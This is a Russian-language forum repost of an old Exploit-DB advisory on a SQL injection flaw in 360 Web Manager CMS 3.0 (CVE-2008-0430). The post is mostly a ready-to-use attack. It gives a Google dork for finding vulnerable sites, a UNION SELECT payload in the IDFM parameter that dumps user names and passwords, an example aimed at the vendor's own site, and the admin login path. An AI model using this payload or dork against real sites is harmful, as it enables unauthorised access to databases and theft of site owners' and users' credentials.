Exploit 360 Web Manager 3.0 - 'IDFM' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4944
Проверка EDB
  1. Пройдено
Автор
DED MUSTD!E
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0430
Дата публикации
2008-01-20
Код:
360 Web Manager CMS Remote SQL Injection Vulnerability

Author: Ded MustD!e

Site: http://www.360webmanager.com/

Google Dork: inurl:"IDFM=" "form.php"

Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*

Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*  =)))

Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php

# milw0rm.com [2008-01-20]
 
Источник
www.exploit-db.com

Похожие темы